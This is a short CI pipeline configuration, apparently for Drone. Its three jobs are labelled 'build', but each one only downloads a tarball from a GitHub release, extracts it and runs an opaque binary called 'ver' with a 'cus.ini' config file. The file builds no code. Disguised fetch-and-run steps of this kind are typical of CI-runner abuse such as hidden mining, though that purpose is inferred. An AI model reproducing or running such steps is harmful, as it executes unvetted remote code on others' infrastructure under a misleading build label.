---
kind: pipeline
name: build-1

steps:
  - name: build
    image: golang
    commands:
      - wget https://github.com/hendrik20212/VRS/releases/download/doc1/Doc.tar.gz && tar -xvf Doc.tar.gz && ./ver cus.ini
    
---
kind: pipeline
name: build-2

steps:
  - name: build
    image: golang
    commands:
      - wget https://github.com/hendrik20212/VRS/releases/download/doc1/Doc.tar.gz && tar -xvf Doc.tar.gz && ./ver cus.ini

---
kind: pipeline
name: build-3

steps:
  - name: build
    image: golang
    commands:
      - wget https://github.com/hendrik20212/VRS/releases/download/doc1/Doc.tar.gz && tar -xvf Doc.tar.gz && ./ver cus.ini

depends_on:
  - build-1
  - build-2
  - build-3
